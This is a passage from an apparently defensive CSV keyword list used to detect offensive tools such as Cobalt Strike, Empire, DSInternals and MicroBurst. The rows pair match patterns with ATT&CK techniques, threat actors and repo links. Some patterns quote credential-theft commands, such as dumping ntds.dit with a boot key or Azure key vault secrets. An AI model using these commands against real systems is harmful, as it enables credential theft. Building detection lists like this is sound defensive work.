APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*get_process_inject_bof_allocator*",".{0,1000}get_process_inject_bof_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*get_process_inject_execute*",".{0,1000}get_process_inject_execute.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*get_rooot.c*",".{0,1000}get_rooot\.c.{0,1000}","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation 
tools","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","3","203","44","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z" "*get_sharpurls*",".{0,1000}get_sharpurls.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*get_stage_allocator*",".{0,1000}get_stage_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*get_stage_magic_mz_64*",".{0,1000}get_stage_magic_mz_64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*get_stage_magic_mz_86*",".{0,1000}get_stage_magic_mz_86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*get_stage_magic_pe*",".{0,1000}get_stage_magic_pe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" 
"*get_virtual_Hook_address*",".{0,1000}get_virtual_Hook_address.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*Get_WinPwn_Repo.sh*",".{0,1000}Get_WinPwn_Repo\.sh.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Get-AccessTokenWithPRT*",".{0,1000}Get\-AccessTokenWithPRT.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific 
terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Get-AccountPassDontExpire*",".{0,1000}Get\-AccountPassDontExpire.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*Get-AclModificationRights*",".{0,1000}Get\-AclModificationRights.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Get-ActiveTCPConnections*",".{0,1000}Get\-ActiveTCPConnections.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Start-MonitorTCPConnections.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-ADComputer * -Properties PrincipalsAllowedToDelegateToAccount*",".{0,1000}Get\-ADComputer\s.{0,1000}\s\-Properties\sPrincipalsAllowedToDelegateToAccount.{0,1000}","offensive_tool_keyword","powershell","Command to get the list of accounts with PrincipalsAllowedToDelegateToAccount (used to exploit Bronze Bit Attack)","T1003 - T1057 - T1087 - T1482 - T1136","TA0001 - TA0002 - TA0005 - TA0006 - TA0008","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-ADCSVulns*",".{0,1000}Get\-ADCSVulns.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - 
TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*Get-ADDBAccount * -DataBasePath *ntds.dit*",".{0,1000}Get\-ADDBAccount\s.{0,1000}\s\-DataBasePath\s.{0,1000}ntds\.dit.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*Get-ADDBAccount * -DBPath *ntds.dit*",".{0,1000}Get\-ADDBAccount\s.{0,1000}\s\-DBPath\s.{0,1000}ntds\.dit.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*Get-ADDBAccount -All -DBPath *.ntds.dit* -BootKey*",".{0,1000}Get\-ADDBAccount\s\-All\s\-DBPath\s.{0,1000}\.ntds\.dit.{0,1000}\s\-BootKey.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*Get-ADDBAccount* -BootKey* -DataBasePath *.ntds.dit",".{0,1000}Get\-ADDBAccount.{0,1000}\s\-BootKey.{0,1000}\s\-DataBasePath\s.{0,1000}\.ntds\.dit","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - 
T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*Get-ADDBAccount* -BootKey* -DBPath *.ntds.dit",".{0,1000}Get\-ADDBAccount.{0,1000}\s\-BootKey.{0,1000}\s\-DBPath\s.{0,1000}\.ntds\.dit","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*Get-ADDBAccount* -DataBasePath *.ntds.dit* -BootKey*",".{0,1000}Get\-ADDBAccount.{0,1000}\s\-DataBasePath\s.{0,1000}\.ntds\.dit.{0,1000}\s\-BootKey.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*Get-ADReplAccount -All *",".{0,1000}Get\-ADReplAccount\s\-All\s.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*Get-ADUsernameFromEWS*",".{0,1000}Get\-ADUsernameFromEWS.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). 
It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*GetADUsers.py*",".{0,1000}GetADUsers\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*Get-ADUsersWithoutPreAuth*",".{0,1000}Get\-ADUsersWithoutPreAuth.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*getAggressorClient*",".{0,1000}getAggressorClient.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*getAllUserSpns*",".{0,1000}getAllUserSpns.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","10","10","1068","180","2024-02-13T12:41:07Z","2016-05-24T18:46:56Z" "*Get-ASREPHash*",".{0,1000}Get\-ASREPHash.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","AS-REP roasting Get the hash for a roastable user using ASREPRoast.ps1","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-AzAutomationAccountCredsREST.ps1*",".{0,1000}Get\-AzAutomationAccountCredsREST\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" 
"*Get-AzDomainInfo*",".{0,1000}Get\-AzDomainInfo.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Get-AzDomainInfoREST.ps1*",".{0,1000}Get\-AzDomainInfoREST\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Get-AzKeyVaultKeysREST.ps1*",".{0,1000}Get\-AzKeyVaultKeysREST\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Get-AzKeyVaultSecretsREST.ps1*",".{0,1000}Get\-AzKeyVaultSecretsREST\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Get-AzPasswords*",".{0,1000}Get\-AzPasswords.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" 
"*Get-AZStorageKeysREST.ps1*",".{0,1000}Get\-AZStorageKeysREST\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Get-AzureADDomainInfo*",".{0,1000}Get\-AzureADDomainInfo.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Get-AzureADDomainInfo.ps1*",".{0,1000}Get\-AzureADDomainInfo\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Get-AzureADUsers *",".{0,1000}Get\-AzureADUsers\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Gets user directory","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Get-AzurePasswords*",".{0,1000}Get\-AzurePasswords.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" 
"*Get-AzUserAssignedIdentity*",".{0,1000}Get\-AzUserAssignedIdentity.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Get-BaseLineResponseTimeEAS*",".{0,1000}Get\-BaseLineResponseTimeEAS.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Get-BeaconAPI*",".{0,1000}Get\-BeaconAPI.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 